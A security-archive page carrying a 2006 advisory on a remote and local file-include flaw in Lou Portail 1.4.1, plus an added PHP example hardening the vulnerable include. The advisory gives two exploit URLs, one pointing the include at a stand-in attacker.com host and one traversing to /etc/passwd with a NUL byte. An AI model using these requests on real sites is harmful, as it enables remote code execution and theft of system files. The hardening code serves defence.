Information Security


Additional information

  Daily digest of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)

  Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

  phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability

  Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

  Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change

From: mp01010_(at)_yahoo.com <mp01010_(at)_yahoo.com>
Date: October 23, 2006
Subject: Lou Portail 1.4.1 Remote|Local File Include Vulnerability

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ Lou Portail 1.4.1 ]                               #
#                                                               #
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published: 2006/10/18                                         #
# Remote:    Yes                                                #
# Local:     No                                                 #
# Type:      High                                               #
# Site:      http://louportail.free.fr/                         #
# Author:    MP                                                 #
# Contact:   [email protected]                                  #
#                                                               #
#################################################################

Vuln Code (admin/admin_module.php):

<?...
 include ("$g_admin_rep/admin_utils.$g_ext");
...?>

#Vuln 1.0 -> require register_globals = On
http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt

#Vuln 2.0 -> require magic_quotes_gpc = Off
http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd%00


# milw0rm.com [2006-10-20]
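
The include in admin/admin_module.php builds its path from two variables that a request can set. The following is an added example, not Lou Portail code and not from the advisory's author, showing one way to harden that include in PHP. safe_admin_include() and the temp directory are hypothetical, and PHP 7.1 or later is assumed:

```php
<?php
// Added example, not Lou Portail code. safe_admin_include() and the temp
// directory are hypothetical/constructed. Assumes PHP 7.1 or later.

function safe_admin_include(string $baseDir, string $name, string $ext): string
{
    $allowedExt = ['php'];   // fixed allowlist, never request data

    // "Vuln 2.0" relies on %00 truncating the path: refuse NUL bytes outright.
    if (strpos($name . $ext, "\0") !== false) {
        throw new InvalidArgumentException('NUL byte in include target');
    }
    // Plain file names only: no "/", ".." or "scheme://" passes this pattern.
    if (!preg_match('/^[A-Za-z0-9_]+\z/', $name) || !in_array($ext, $allowedExt, true)) {
        throw new InvalidArgumentException('include target not allowlisted');
    }
    // Canonicalise, then confirm the file really sits inside the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . "$name.$ext");
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('include target outside admin directory');
    }
    return $path;
}

// Constructed demo: a temp directory standing in for admin/. In the real
// script the base directory must be set in code, not left to register_globals.
$adminDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lp_admin_' . getmypid();
mkdir($adminDir);
file_put_contents($adminDir . '/admin_utils.php', "<?php // stub\n");

// Constructed [name, ext] inputs: a legitimate one, the advisory's g_ext value,
// and a traversal string ending in a NUL byte like its second request.
$cases = [
    ['admin_utils', 'php'],
    ['admin_utils', 'txt'],
    ["../../../etc/passwd\0", 'php'],
];
foreach ($cases as [$name, $ext]) {
    try {
        $path = safe_admin_include($adminDir, $name, $ext);
        echo "allowed:  $path\n";   // a real caller would now: require $path;
    } catch (Exception $e) {
        echo 'rejected: ' . $e->getMessage() . "\n";
    }
}
unlink($adminDir . '/admin_utils.php');
rmdir($adminDir);
```

Independently of the code change, register_globals = Off removes the first precondition the advisory lists, and allow_url_include = Off (PHP 5.2 and later) blocks remote include targets.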

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod